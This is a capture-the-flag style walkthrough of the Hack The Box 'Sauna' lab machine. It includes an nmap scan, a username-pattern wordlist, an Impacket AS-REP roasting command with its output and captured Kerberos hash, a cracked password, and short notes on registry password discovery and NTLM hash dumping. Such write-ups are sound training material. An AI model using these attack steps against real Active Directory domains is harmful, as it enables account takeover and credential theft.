Hackthebox sauna Writeup – 10.10.10.175

Hackthebox Sauna Writeup
Hackthebox Sauna Writeup
5
(1)

Port Scan

Nmap 7.80 scan initiated Sat Jul 4 03:58:53 2020 as: nmap -sC -sV -v -oN nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.26s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-04 18:04:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/4%Time=5F0036DF%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: 10h05m15s | smb2-security-mode: | 2.02: | Message signing enabled and required
| smb2-time:
| date: 2020-07-04T18:07:09
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sat Jul 4 04:04:30 2020 -- 1 IP address (1 host up) scanned in 337.44 seconds

Website enumeration

So as it is an easy machine so I looked at the website first.

Also I had in mind that port 88 is open .So maybe we can try Kerbose ticket attack.

Hackthebox sauna Writeup - 10.10.10.175

After looking at the website I got some potential user names to perform Kerberos Attack.

Hackthebox sauna Writeup - 10.10.10.175

Making custom username wordlist

I created a simple user.txt file with names of the user but it did not worked .Which means that we have to try some other common user names pattern.

Fergus.Smith
Fergus.a.Smith
FSmith
FaSmith
FeSmith
FeaSmith
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HuBear
HuaBear
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StKerb
StaKerb
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShCoins
ShaCoins
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BoTaylor
BoaTaylor
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SoDriver
SoaDriver

Kerbose attack

Now it worked.

➜ sauna GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile user.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.175
Impacket v0.9.22.dev1+20200605.133909.874d7ae4 - Copyright 2020 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Cracking the hash

And we have the hash this time.

➜ sauna cat hashes.txt
[email protected]:f4f60f52f846d64e20632f6682e7a19b$3a7abdb0fc1fe80384759a2cfe5ad0f185dd20af39f1a40dfd32733526250ed401c9b2fbadd8f22a7ec6f93e9662bea689db4d30b05b81a8e1583f478f8289b3258a33c6ab52ce3736b8b9a694f3c93aa2c036f00fe66f49cc7212f377214cc9b3c7fac3b7e69006fe3fb2e3616c4fd4c786bf5f7972b9a83427ccd3392e89b56e4708b0026f881e9408ea3737392636935b51cdd37741265470e51d41e3cf3259f8ca492058aed7183e6a96a0f9b7a7c7d5bf2f132f71d8eb944db82c94e6ad2796a11fc9a29d41c0d347e431295ae9ba86b49023e4b2d80daa16d1c4561539559db5870a7247b08a79d949e4ca1f20fbba06c3c65171056b8345ec95431637

Now we have the hash for the FSmith user.So let’s crack it using john.

Hackthebox sauna Writeup - 10.10.10.175

And now I have the creds

FSmith:Thestrokes23

Getting user flag

So now let’s login using evil-winrm

Hackthebox sauna Writeup - 10.10.10.175

And we successfully have the user flag.

Privilege escalation

Now for privilege escalation I used a script .

Hackthebox sauna Writeup - 10.10.10.175

Using that script i got the password in the registry .

Dumping NTLM hashes

It was an easy machine so I thought to try dumping the NTLM hashes using the creds we got from the script .

Hackthebox sauna Writeup - 10.10.10.175

And we have the administrator hash . So now we can login and get the root flag.

Hackthebox sauna Writeup - 10.10.10.175

Thanks for reading have a nice day

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 1

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *